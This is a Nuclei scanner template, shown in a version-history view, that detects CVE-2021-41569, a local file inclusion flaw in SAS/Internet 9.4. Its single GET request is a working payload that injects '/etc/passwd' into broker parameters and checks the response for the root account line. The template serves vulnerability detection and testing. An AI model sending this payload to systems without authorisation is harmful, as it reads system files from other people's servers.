nuclei-templates/http/cves/2021/CVE-2021-41569.yaml

40 lines
1.4 KiB
YAML
Raw Normal View History

2022-06-27 08:40:09 +00:00
id: CVE-2021-41569
2022-08-22 07:17:05 +00:00
2022-06-27 08:40:09 +00:00
info:
name: SAS/Internet 9.4 1520 - Local File Inclusion
2022-06-27 08:40:09 +00:00
author: 0x_Akoko
severity: high
description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro.
2022-06-27 08:40:09 +00:00
reference:
- https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas
- https://support.sas.com/kb/68/641.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-41569
2022-06-27 08:40:09 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-41569
cwe-id: CWE-829
cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:*
epss-score: 0.00712
2022-06-27 08:40:09 +00:00
tags: cve,cve2021,sas,lfi
metadata:
max-request: 1
2022-06-27 08:40:09 +00:00
http:
2022-06-27 08:40:09 +00:00
- method: GET
path:
- "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/15